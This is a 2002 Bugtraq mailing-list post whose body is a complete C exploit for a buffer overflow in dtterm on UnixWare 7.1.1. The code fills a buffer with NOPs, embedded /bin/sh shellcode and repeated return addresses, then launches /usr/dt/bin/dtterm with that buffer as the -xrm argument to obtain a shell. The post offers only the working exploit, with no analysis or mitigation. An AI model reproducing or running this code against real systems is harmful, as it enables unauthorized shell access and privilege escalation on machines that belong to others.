dtterm exploit in Unixware 7.1.1
Date: 8 Jan 2002 06:12:56 -0000
From: jG gM <jggm@mail.com>
To: bugtraq@securityfocus.com
Subject: dtterm exploit in Unixware 7.1.1
Here is code.../*
* dtterm buffer overflow by jGgM
* http://www.netemperor.com/en/
* EMail: jggm@mail.com
*
*/
#include <stdio.h>
#include <stdlib.h>
char shell[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0
\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50
\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2
\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53
\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8
\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68
\xff\xff\xff\xff\xff\xff\xff\xff\xff";
#define NOP 0x90
#define LEN 102
#define BUFFER_SIZE 1052
#define RET_LENGTH 10
#define ADJUST 4
long get_sp(void) {
__asm__("movl %esp, %eax");
}
int
main(int argc, char *argv[])
{
char buffer[BUFFER_SIZE+(RET_LENGTH*4)+1];
long offset, ret;
int x, y;
if(argc > 2) {
fprintf(stderr, "Usage: %s [offset]\n", argv[0]);
exit(1);
} // end of if..
if(argc == 2) offset = atol(argv[1]);
else offset = 0;
ret = get_sp() + 900 + offset;
for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP;
x = BUFFER_SIZE - strlen(shell) - ADJUST;
for(y=0; y<strlen(shell); y++)
buffer[x++] = shell[y];
for(y=0; y<RET_LENGTH; y++, x += 4)
*((int *)&buffer[x]) = ret;
buffer[x] = 0x00;
printf("ret = 0x%x,\n", ret);
printf("offset = %d\n", offset);
printf("buffer size = %d\n", strlen(buffer));
execl("/usr/dt/bin/dtterm", "dtterm", "-xrm", buffer,
NULL);
printf("exec failed\n");
}
